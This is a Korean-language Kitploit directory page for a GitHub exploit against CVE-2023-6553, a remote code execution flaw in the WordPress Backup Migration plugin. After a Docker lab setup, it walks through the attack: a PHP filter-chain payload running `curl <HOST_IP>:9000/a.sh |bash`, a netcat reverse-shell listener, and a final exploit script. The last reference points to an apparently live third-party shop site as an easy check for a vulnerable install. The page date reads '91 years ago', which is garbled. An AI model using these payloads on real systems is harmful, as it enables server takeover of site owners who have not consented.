Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-6553 — Wordpress의 Backup 플러그인에서 CVE-2023-6553에 대한 익스플로잇 개발 | Kitploit
도구/GitHubGitHub/harshit-mashru/cve-2023-6553
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubharshit-mashru/cve-2023-6553

CVE-2023-6553

Wordpress의 Backup 플러그인에서 CVE-2023-6553에 대한 익스플로잇 개발

저장소 보기
91년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-6553

Wordpress의 Backup 플러그인에서 CVE-2023-6553에 대한 익스플로잇 개발

CVSS 점수 9.8의 중요 CVE입니다.

이 취약점은 공격자가 취약한 버전의 플러그인이 실행 중인 서버에 명령을 전송할 수 있게 합니다.

취약한 버전 Backup <= 1.3.7

설정

  1. 저장소를 git clone 하세요

  2. 아래 명령어를 실행하여 docker 컨테이너를 설정하세요

docker-compose up -d

다음과 같은 2개의 docker 컨테이너가 보일 것입니다.

  • Wordpress
  • SQL
  1. 이제 docker 컨테이너의 IP에서 wordpress 사이트로 이동할 수 있으며, 다음 주소로도 접근할 수 있습니다.
http://localhost:8000/
  1. 취약한 backup 플러그인을 설치하려면 다음 명령어를 실행하세요
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
  1. 이제 3단계의 링크를 사용하여 wordpress 웹사이트에 로그인하고, 위 명령어에서 다운로드한 backup 플러그인을 설치하세요.

익스플로잇

  1. 익스플로잇을 실행할 때 콜백을 받기 위해 포트 9000에서 리스너를 시작하세요.
python3 -m http.server
  1. 다음 명령어를 사용하여 go 스크립트를 실행하세요
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
  1. 다음과 같은 오류가 발생할 것입니다.
HTTP Response Body:  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>

이는 필터 변환 후 헤더 크기가 서버가 허용하는 한도를 초과하기 때문입니다.

  1. 그러므로 이제 명령을 여러 조각으로 나누어 원격 서버의 파일에 기록한 다음 실행합니다. 하지만 그 전에 리버스 셸을 받기 위해 리스닝을 시작해야 합니다.
nc -nlvp 8080

그리고 이제 취약한 플러그인을 익스플로잇하는 명령어를 실행하세요.

python3 final_exploit.py
  1. 이 시점에서 리버스 셸을 획득했을 것입니다.

참고 자료

  • https://patchstack.com/articles/test-wordpress-plugin-security/
  • https://patchstack.com/whitepaper/the-state-of-wordpress-security-in-2021/
  • https://wordpress.org/plugins/backup-backup/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup-backup/backup-migration-137-unauthenticated-remote-code-execution
  • https://plugins.trac.wordpress.org/browser/backup-backup/​
  • https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py ​
  • https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it ​
  • 취약한 버전의 wordpress가 설치되어 있는지 확인하는 것이 얼마나 쉬운지: https://www.thetraveloutlier.com/shop/​
도구 다운로드